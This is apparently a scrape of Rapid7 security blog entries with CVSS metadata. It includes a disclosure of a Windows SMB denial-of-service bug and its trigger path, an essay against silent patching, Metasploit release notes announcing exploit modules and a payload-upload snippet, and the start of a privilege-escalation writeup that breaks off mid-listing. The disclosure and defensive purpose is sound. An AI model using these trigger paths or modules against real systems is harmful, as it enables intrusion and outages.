"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4191", "CVE-2022-1026", "CVE-2022-24527", "CVE-2022-28810"], "modified": "2022-04-14T15:48:37", "id": "RAPID7BLOG:54BE79B36876FBCEC89838B064A4B509", "href": "https://blog.rapid7.com/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T17:59:30", "description": "\n\nA remote and unauthenticated attacker can trigger a denial-of-service condition on Microsoft Windows Domain Controllers by leveraging a flaw that leads to a null pointer deference within the Windows kernel. We believe this vulnerability would be scored as CVSSv3 [AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H&version=3.1>) or 7.5. This vulnerability was silently patched by Microsoft in April of 2022 in the same batch of changes that addressed the unrelated CVE-2022-24500 vulnerability.\n\n## Credit\n\nThis issue was fixed by Microsoft without disclosure in April 2022, but because it was originally classed as a mere stability bug fix, it did not go through the usual security issue process. In May, Spencer McIntyre of Rapid7 discovered this issue while researching the fix for CVE-2022-24500 and determined the security implications of CVE-2022-32230. It is being disclosed in accordance with [Rapid7\u2019s vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>).\n\n## Exploitation\n\nCVE-2022-32230 is caused by a missing check in `srv2!Smb2ValidateVolumeObjectsMatch` to verify that a pointer is not null before reading a `PDEVICE_OBJECT` from it and passing it to `IoGetBaseFileSystemDeviceObject`. The following patch diff shows the function in question for Windows 10 21H2 (unpatched version 10.0.19041.1566 on the left).\n\n\n\nThis function is called from the dispatch routine for an SMB2 `QUERY_INFO` request of the `FILE_INFO / FILE_NORMALIZED_NAME_INFORMATION` class. Per the docs in MS-SMB2 section [3.3.5.20.1 Handling SMB2_0_INFO_FILE](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/d64e0451-64a2-425a-848e-52a7dddab7b9>), `FILE_NORMALIZED_NAME_INFORMATION` is only available when the dialect is 3.1.1.\n\nFor FileNormalizedNameInformation information class requests, if not supported by the server implementation&lt;392&gt;, or if Connection.Dialect is &quot;2.0.2&quot;, &quot;2.1&quot; or &quot;3.0.2&quot;, the server MUST fail the request with STATUS_NOT_SUPPORTED.\n\nTo trigger this code path, a user would open any named pipe from the IPC$ share and make a `QUERY_INFO` request for the `FILE_NORMALIZED_NAME_INFORMATION` class. This typically requires user permissions or a non-default configuration enabling guest access. This is not the case, however, for the noteworthy exception of domain controllers where there are multiple named pipes that can be opened anonymously, such as `netlogon`. An alternative named pipe that can be used but does typically require permissions is the `srvsvc` pipe.\n\nUnder normal circumstances, the `FILE_NORMALIZED_NAME_INFORMATION` class would be used to query the normalized name information of a file that exists on disk. This differs from the exploitation scenario which queries a named pipe.\n\nA system that has applied the patch for this vulnerability will respond to the request with the error `STATUS_NOT_SUPPORTED`.\n\n### Proof of concept\n\nA proof-of-concept Metasploit module is available on [GitHub](<https://github.com/zeroSteiner/metasploit-framework/blob/feat/mod/cve-2022-32230/modules/auxiliary/dos/smb/smb_filenormalizednameinformation.rb>). It requires Metasploit version 6.2 or later.\n\n## Impact\n\nThe most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition. Given the current state of the art of exploitation, it is assumed that a null pointer dereference in the Windows kernel is not remotely exploitable for the purpose of arbitrary code execution without combining it with another, unrelated vulnerability.\n\nIn the default configuration, Windows will automatically restart after a BSOD.\n\n## Remediation\n\nIt is recommended that system administrators apply the official patches provided by Microsoft in their April 2022 update. If that is not possible, restricting access and disabling SMB version 3 can help remediate this flaw.\n\n## Disclosure timeline\n\n**April 12th, 2022** \u2013 Microsoft patches CVE-2022-32230 \n**April 29th, 2022** \u2013 Rapid7 finds and confirms the vulnerability while investigating CVE-2022-24500 \n**May 4th, 2022** \u2013 Rapid7 contacts MSRC to clarify confusion regarding CVE-2022-32230 \n**May 18th, 2022** \u2013 Microsoft responds to Rapid7, confirming that the vulnerability now identified as CVE-2022-32230 is different from the disclosed vulnerability CVE-2022-24500 with which it was patched \n**June 1, 2022** \u2014 Rapid7 reserves CVE-2022-32230 after discussing with Microsoft \n**June 14th, 2022** \u2013 Rapid7 releases details in this disclosure, and Microsoft publishes [its advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-32230>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[The Hidden Harm of Silent Patches](<https://www.rapid7.com/blog/post/2022/06/06/the-hidden-harm-of-silent-patches/>)_\n * _[CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)](<https://www.rapid7.com/blog/post/2022/05/24/cve-2022-22977-vmware-guest-authentication-service-lpe-fixed/>)_\n * _[A Year on from the Ransomware Task Force Report](<https://www.rapid7.com/blog/post/2022/05/24/a-year-on-from-the-ransomware-task-force-report/>)_\n * _[CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>)_[[ \n](<https://www.rapid7.com/blog/post/2022/05/24/a-year-on-from-the-ransomware-task-force-report/>)](<https://www.rapid7.com/blog/post/2022/05/24/a-year-on-from-the-ransomware-task-force-report/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T17:10:06", "type": "rapid7blog", "title": "CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22977", "CVE-2022-24500", "CVE-2022-30525", "CVE-2022-32230"], "modified": "2022-06-14T17:10:06", "id": "RAPID7BLOG:729B902E7836EDA19BEC4A8EF1C066CF", "href": "https://blog.rapid7.com/2022/06/14/cve-2022-32230-windows-smb-denial-of-service-vulnerability-fixed/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T17:36:33", "description": "\n\nHey all. I'm about to head off to [RSAC 2022](<https://events.rapid7.com/rsac-2022/>), but I wanted to jot down some thoughts I've had lately on a particularly squirrelly issue that comes up occasionally in coordinated vulnerability disclosure (CVD) \u2014 the issue of silent patches, and how they tend to help focused attackers and harm IT protectors.\n\nIn the bad old days, most major software vendors were rather notorious for sweeping vulnerability reports under the rug. They made it difficult for legitimate researchers to report vulnerabilities, often by accident, occasionally on purpose. Researchers would report bugs, and those reports would fester in unobserved space, then suddenly the proof-of-concept exploit wouldn't work any more. This was (and is) the standard silent patching model. No credit, no explanation, no CVE ID, nothing.\n\nThe justification for this approach seems pretty sensible, though. Why would a vendor go out of their way to explain what a security fix does? After all, if you know how the [patch](<https://www.rapid7.com/fundamentals/patch-management/>) works, then you have a pretty good guess at the root cause of the vulnerability and, therefore, how the exploit works. So, by publicizing these patch details, you're effectively leading attackers to the goods, based on your own documentation. Not cool, right?\n\nSo, the natural conclusion is that by limiting the technical details of a given vulnerability to merely the patch contents, and by withholding those details explained in plan languages and proof-of-concept exploit code and screenshots and videos and all the rest, _you are limiting the general knowledge pool of people who actually understand the vulnerability and how to exploit it._\n\n## Unpacking the silent patch\n\nThis sounds like a great plan, but there's a catch. When a software company releases a [patch for software](<https://www.rapid7.com/fundamentals/patch-management/>), in nearly all cases, they're not using exotic packers, they're not employing anti-forensics, and even if the patch data is encrypted and obfuscated, at some point it's got to modify the code on the running software \u2014 which means that it's all available to anyone who has a running instance of the patched software and knows how to use a debugger and a disassembler. And who uses debuggers to inspect the effects of patches? Exploit developers, pretty much exclusively.\n\nKnowing this, let's modify the expectations of the silent patch strategy: _When you silently patch, you are intending to limit knowledge of the patched vulnerability to skilled exploit devs._\n\nIt's still true that you're excluding the casual attacker (or \"script kiddie,\" in the common parlance), and that's great and desirable. However, you're also excluding a huge population of IT protectors: [penetration testers](<https://www.rapid7.com/fundamentals/penetration-testing/>) who are paid to write and run exploits to test defenses leap to mind, in addition to the folks who write and deploy defensive technologies like vulnerability management, intrusion detection and prevention, incident detection, and all the rest. You also exclude tech journalists, academics, and policy makers who want to understand and communicate the nature of software vulnerabilities, but who aren't likely to bust out a disassembler.\n\nMost significantly, you're excluding the most important audience for your patch: the regular IT administrators and managers who need to sort out the incoming flow of patches based on some risk and severity criteria and make the call for downtime and update scheduling based on that criteria. Not all vulnerabilities are equal, and while protectors want to get around to all of them, they need to figure out which ones to apply today and which ones can wait for the next maintenance cycle.\n\nBy the way, it's true that some of these IT professionals also have the capability to reverse-engineer your patch. In practice, people who are only interested in keeping IT humming never, ever reverse patches to see if they're worth applying. It's way too complicated and time-consuming. I've never seen a case where this is part of the decision-making process to patch now or later.\n\n## Don\u2019t leave defenders in the dark\n\nSo now, let's reexamine the case for silent patching yet again: _When you silently patch, you are communicating vulnerability details, exclusively, to skilled, criminal attackers who are specifically targeting your product, while leaving your customers in the dark._ You are intentionally withholding information from casual attackers, secondary defenders, and your customers and users who are desperate to make informed security engineering decisions involving your product or project. Oh, and let's not forget, you're also limiting knowledge about these fixed vulnerabilities from future employees and contributors, who very well might re-introduce the same or similar bugs in your product down the road. After all, the details are secret, even from future-you.\n\nAll this is to say, silent patching is tantamount to full disclosure to a very small audience who mostly want to hurt you and your users. Fully documented patches reach the much, much larger audience of people, present and future, who want to help you and your users. While it's true that you are also offering educational opportunities to casual attackers along the way, I believe the global population of casual attackers is much, much smaller than your legitimate users and all the secondary and tertiary defenders who are on your side.\n\nSo, next time a vulnerability researcher states their intention of publishing details about their reported (and now patched) vulnerability, try to examine your urge to keep those details under wraps, and maybe even encourage them to be honest and transparent with their findings. The alternative is to build up the operational capabilities of the true criminal and espionage enterprises while degrading the decision-making power of IT protectors.\n\n_**Additional reading:**_\n\n * _[CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)](<https://www.rapid7.com/blog/post/2022/05/24/cve-2022-22977-vmware-guest-authentication-service-lpe-fixed/>)_\n * _[A Year on from the Ransomware Task Force Report](<https://www.rapid7.com/blog/post/2022/05/24/a-year-on-from-the-ransomware-task-force-report/>)_\n * _[2022 Cloud Misconfigurations Report: A Quick Look at the Latest Cloud Security Breaches and Attack Trends](<https://www.rapid7.com/blog/post/2022/04/20/2022-cloud-misconfigurations-report-a-quick-look-at-the-latest-cloud-security-breaches-and-attack-trends/>)_\n * _[Lessons in IoT Hacking: How to Dead-Bug a BGA Flash Memory Chip](<https://www.rapid7.com/blog/post/2022/04/07/lessons-in-iot-hacking-how-to-dead-bug-a-bga-flash-memory-chip/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-06-06T16:00:00", "type": "rapid7blog", "title": "The Hidden Harm of Silent Patches", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22977"], "modified": "2022-06-06T16:00:00", "id": "RAPID7BLOG:6FB93F99513738A3B5219817203B39B5", "href": "https://blog.rapid7.com/2022/06/06/the-hidden-harm-of-silent-patches/", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-05-23T17:34:25", "description": "## Zyxel firewall unauthenticated command injection\n\n\n\nThis week, our very own [Jake Baines](<https://github.com/jbaines-r7>) added an exploit module that leverages [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>), an unauthenticated remote command injection vulnerability in Zyxel firewalls with zero touch provisioning (ZTP) support. Jake is also the author of the original research and [advisory](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) that was published last week. This module allows an attacker to achieve arbitrary code execution as the `nobody` user on affected devices. It takes advantage of an unsanitized user input that feeds the python `os.system` method behind the scenes. Well done Jake!\n\n## SAML credentials generator for vCenter Server\n\nCommunity contributor [npm-cesium137-io](<https://github.com/npm-cesium137-io>) added an auxiliary module that forges valid SAML credentials for vCenter server. These credentials are very useful since they can be used to gain access to the SSO domain as a vSphere administrator. Note that this module cannot run offline and must be executed while the target vCenter is reachable over the network to properly acquire the administrator session token. Also, the vCenter SSO Identity Provider (IdP) trusted certificate chain needs to be provided. This can be extracted manually from the `vmdir` database file at `/storage/db/vmware-vmdir/data.mdb` using [`binwalk`](<https://github.com/ReFirmLabs/binwalk>) or using this post [module](<https://github.com/rapid7/metasploit-framework/pull/16465>), which is still in review at the time of writing.\n\n## GSOC 2022\n\nThe Metasploit project was accepted again for the Google Summer of Code program. This year the team welcomes back [pingport80](<https://github.com/pingport80>) as a returning contributor and [3V3RYONE](<https://github.com/3V3RYONE>). These students will be working on Post API improvements and expanded HTTP-Trace support respectively. We look forward to mentoring and working with them in the coming months, so stay tuned for further updates as they get started!\n\n## New module content (3)\n\n * [VMware vCenter Forge SAML Authentication Credentials](<https://github.com/rapid7/metasploit-framework/pull/16484>) by npm - This module forges valid SAML credentials for vCenter server using the vCenter SSO IdP certificate, IdP private key, and VMCA root certificate as input objects.\n * [Zyxel Firewall ZTP Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16563>) by jbaines-r7, which exploits [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>) \\- A new module has been added to exploit CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the `nobody` user.\n * [Bookmarked Sites Retriever](<https://github.com/rapid7/metasploit-framework/pull/16406>) by jerrelgordon - This adds a module to retrieve the bookmarks from Internet Explorer, Opera, Google Chrome, and Edge.\n\n## Enhancements and features (3)\n\n * [#16430](<https://github.com/rapid7/metasploit-framework/pull/16430>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This adds support for logging AS-REP Roastable accounts, as well as storing the generated Kerberos token within the creds database. Additionally improves error handling.\n * [#16442](<https://github.com/rapid7/metasploit-framework/pull/16442>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This adds a new `vars_form_data` field to the Rex HTTP Client for uploading files/form values to a remote HTTP server with ease:\n \n \n vars_form_data = [\n { 'name' => 'nsp', 'data' => @csrf_token },\n { 'name' => 'upload', 'data' => 1 },\n { 'name' => 'MAX_FILE_SIZE', 'data' => 1000000 },\n { 'name' => 'uploadedfile', 'data' => payload_zip, 'mime_type' => 'application/zip', 'encoding' => 'binary', 'filename' => zip_filename }\n ]\n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_form_data' => vars_form_data\n )\n \n\n * [#16555](<https://github.com/rapid7/metasploit-framework/pull/16555>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This moves a duplicated `retry_until_truthy` function into a centralized location for better reuse. This function is useful for retrying operations that may fail the first time, such as checking if Kubernetes containers are ready yet etc.\n\n## Bugs fixed (6)\n\n * [#16487](<https://github.com/rapid7/metasploit-framework/pull/16487>) from [red0xff](<https://github.com/red0xff>) \\- This fixes a deprecation warning in the `auxiliary/capture/server/mssql` warning as well as outputting a valid John The Ripper format for offline password cracking\n * [#16499](<https://github.com/rapid7/metasploit-framework/pull/16499>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes an issue where SSL connections made by Metasploit would fail when the Server Name Indicator (SNI) extension was in use.\n * [#16505](<https://github.com/rapid7/metasploit-framework/pull/16505>) from [AdrianVollmer](<https://github.com/AdrianVollmer>) \\- This fixes an issue in the `auxiliary/scanner/lotus/lotus_domino_hashes` `#dump_hashes` parsing logic.\n * [#16570](<https://github.com/rapid7/metasploit-framework/pull/16570>) from [ssst0n3](<https://github.com/ssst0n3>) \\- This fixes a bug in the generation of aarch64 stagers so that when the stage is received and written to memory, the stage can execute in a lower-privileged process.\n * [#16572](<https://github.com/rapid7/metasploit-framework/pull/16572>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A bug has been fixed whereby a `PayloadSpaceViolation` exception might be raised when the `--smallest` flag was used with `msfvenom`, due to `msfvenom` setting the space available to 0 instead of a positive number. The code should now appropriately account for this case.\n * [#16588](<https://github.com/rapid7/metasploit-framework/pull/16588>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a check to the two new Powershell adapter payload modules. The size check intends to ensure that payloads that are too large (like unstaged Meterpreters) are marked as incompatible.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.42...6.1.43](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-05-12T07%3A30%3A04-05%3A00..2022-05-19T09%3A28%3A41-05%3A00%22>)\n * [Full diff 6.1.42...6.1.43](<https://github.com/rapid7/metasploit-framework/compare/6.1.42...6.1.43>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T19:14:42", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-20T19:14:42", "id": "RAPID7BLOG:DF545F327BFBC593DA87AAE7B9428479", "href": "https://blog.rapid7.com/2022/05/20/metasploit-weekly-wrap-up-157/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-26T21:31:02", "description": "## ManageEngine ADSelfService Plus Authenticated RCE\n\n\n\nThis module is pretty exciting for us because it's for a vulnerability discovered by our very own Rapid7 researchers [Jake Baines](<https://github.com/jbaines-r7>), Hernan Diaz, Andrew Iwamaye, and Dan Kelly. \nThe vulnerability allowed for attackers to leverage the &quot;custom script&quot; functionality to execute arbitrary operating system commands whenever domain users reset their passwords. \nI won't go into too much depth though because we have a whole blog post [here](<https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/>) for you to check out with all the details! \nOh, and I almost forgot to mention this module comes with a brand new `jjs_reverse_tcp` payload too.\n\n## Who watches the watch_queue?\n\nThis week we've also brought you an LPE for Linux via the watch_queue event notification system. \nThe module exploits a heap out-of-bounds write in kernel memory in versions prior to 5.18 but keep in mind the module currently only has the appropriate offsets for Ubuntu 20.10 with kernel version 5.13.0-37.\n\n## New module content (2)\n\n * [Watch Queue Out of Bounds Write](<https://github.com/rapid7/metasploit-framework/pull/16422>) by Jann Horn, bonfee, and bwatters-r7, which exploits [CVE-2022-0995](<https://attackerkb.com/topics/GnizqM74Hx/cve-2022-0995?referrer=blog>)\n * [ManageEngine ADSelfService Plus Custom Script Execution](<https://github.com/rapid7/metasploit-framework/pull/16475>) by Andrew Iwamaye, Dan Kelley, Hernan Diaz, and Jake Baines, which exploits [CVE-2022-28810](<https://attackerkb.com/topics/CgexXyr25c/cve-2022-28810?referrer=blog>) \\- This adds an exploit for CVE-2022-28810 which is an authenticated RCE in ManageEngine ADSelfService Plus.\n\n## Enhancements and features (6)\n\n * [#16437](<https://github.com/rapid7/metasploit-framework/pull/16437>) from [h00die](<https://github.com/h00die>) \\- Adds ESXi as a recognizable type on ssh_login.\n * [#16438](<https://github.com/rapid7/metasploit-framework/pull/16438>) from [h00die](<https://github.com/h00die>) \\- Some SMTP servers only give out credentials when prompted. Now, the module option 'AUTHPROMPT' exists to indicate whether or not the auth prompt is required by the server.\n * [#16446](<https://github.com/rapid7/metasploit-framework/pull/16446>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This updates the code for compatibility with the latest RubySMB 3.1 gem.\n * [#16458](<https://github.com/rapid7/metasploit-framework/pull/16458>) from [bcoles](<https://github.com/bcoles>) \\- The fortios_vpnssl_traversal_creds_leak module has been updated to appropriately attribute the original discoverers of the vulnerability and to credit their original blog post and research presentations.\n * [#16476](<https://github.com/rapid7/metasploit-framework/pull/16476>) from [bcoles](<https://github.com/bcoles>) \\- The `tools/dev/msftidy.rb` tool has been updated to recommend using CVE datastore references over the cve.mitre.org URL references since this is more maintainable in the long run and will assist transitioning things when CVE transitions to cve.org later this year.\n * [#16477](<https://github.com/rapid7/metasploit-framework/pull/16477>) from [bcoles](<https://github.com/bcoles>) \\- This PR updates several modules to remove hardcoded URL references to the soon to be deprecated cve.mitre.org site, and where applicable, add in CVE references in place of these hardcoded URL references.\n\n## Bugs fixed (5)\n\n * [#16318](<https://github.com/rapid7/metasploit-framework/pull/16318>) from [heyder](<https://github.com/heyder>) \\- Adds support to old key exchange algorithms in the net/ssh lib by defining the append_all_supported_algorithms to true.\n * [#16379](<https://github.com/rapid7/metasploit-framework/pull/16379>) from [heyder](<https://github.com/heyder>) \\- Refactored a number of modules to use ssh_client_defaults.\n * [#16426](<https://github.com/rapid7/metasploit-framework/pull/16426>) from [usiegl00](<https://github.com/usiegl00>) \\- This fixes a crash in OSX Meterpreter's stager caused by mangled `dyld` functions in MacOS Monterey.\n * [#16457](<https://github.com/rapid7/metasploit-framework/pull/16457>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Recent updates in `Rex::Parser::Arguments` regressed the ability to have short flags with multiple characters. This restores functionality by updating the spec checks and library code to appropriately parse multiple character short flags and each individual short flag specified in a combined short flag.\n * [#16479](<https://github.com/rapid7/metasploit-framework/pull/16479>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \\- Meterpreter's `reg setval` command has been updated to allow setting a REG_BINARY key value with the `-d` option with an arbitrarily long binary blob. Previously, this value was treated as a string which lead to an incorrect value being set in the registry field.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.38...6.1.39](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-04-14T12%3A04%3A47-05%3A00..2022-04-21T11%3A42%3A05-05%3A00%22>)\n * [Full diff 6.1.38...6.1.39](<https://github.com/rapid7/metasploit-framework/compare/6.1.38...6.1.39>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-04-22T16:44:10", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0995", "CVE-2022-28810"], "modified": "2022-04-22T16:44:10", "id": "RAPID7BLOG:859150BBDCA5700B960B5B57B302FE39", "href": "https://blog.rapid7.com/2022/04/22/metasploit-weekly-wrap-up-158/", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T21:29:28", "description": "\n\nOn April 12, 2022, Microsoft published [CVE-2022-24527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24527>), a local privilege escalation vulnerability in Microsoft [Connected Cache](<https://docs.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/microsoft-connected-cache>). The vulnerability allowed a local low-privileged user to execute arbitrary Powershell as `SYSTEM` due to improper file permission assignment ([CWE-732](<https://cwe.mitre.org/data/definitions/732.html>)).\n\n## Product description\n\nConnected Cache is a feature used by [Microsoft Endpoint Manager](<https://www.microsoft.com/en-us/security/business/microsoft-endpoint-manager>) \u201c[Distribution Points](<https://docs.microsoft.com/en-us/mem/configmgr/core/servers/deploy/configure/install-and-configure-distribution-points#install-a-distribution-point>)\u201d to support \u201cDelivery Optimization.\u201d\n\n## Credit\n\nThis issue was discovered and reported by security researcher [Jake Baines](<https://twitter.com/junior_baines>) as part of [Rapid7's vulnerability disclosure program](<https://www.rapid7.com/security/disclosure/#zeroday>).\n\n## Exploitation\n\nWhen Connected Cache is in use on a Distribution Point, it is installed, in part, into `C:\\Doinc\\`. Below, you can see that there are some Powershell scripts within that directory:\n \n \n C:\\>dir /s /b C:\\Doinc\\\n C:\\Doinc\\Product\n C:\\Doinc\\Product\\Install\n C:\\Doinc\\Product\\Install\\Logs\n C:\\Doinc\\Product\\Install\\Tasks\n C:\\Doinc\\Product\\Install\\Tasks\\CacheNodeKeepAlive.ps1\n C:\\Doinc\\Product\\Install\\Tasks\\Maintenance.ps1\n C:\\Doinc\\Product\\Install\\Tasks\\SetDrivesToHealthy.ps1\n \n\nLow-privileged users only have `read` and `execute` permissions on the Powershell scripts.\n \n \n C:\\Doinc\\Product\\Install\\Tasks>icacls *.ps1\n CacheNodeKeepAlive.ps1 NT AUTHORITY\\SYSTEM:(I)(F)\n NT AUTHORITY\\NETWORK SERVICE:(I)(F)\n BUILTIN\\Administrators:(I)(F)\n BUILTIN\\Users:(I)(RX)\n \n Maintenance.ps1 NT AUTHORITY\\SYSTEM:(I)(F)\n NT AUTHORITY\\NETWORK SERVICE:(I)(F)\n BUILTIN\\Administrators:(I)(F)\n BUILTIN\\Users:(I)(RX)\n \n SetDrivesToHealthy.ps1 NT AUTHORITY\\SYSTEM:(I)(F)\n NT AUTHORITY\\NETWORK SERVICE:(I)(F)\n 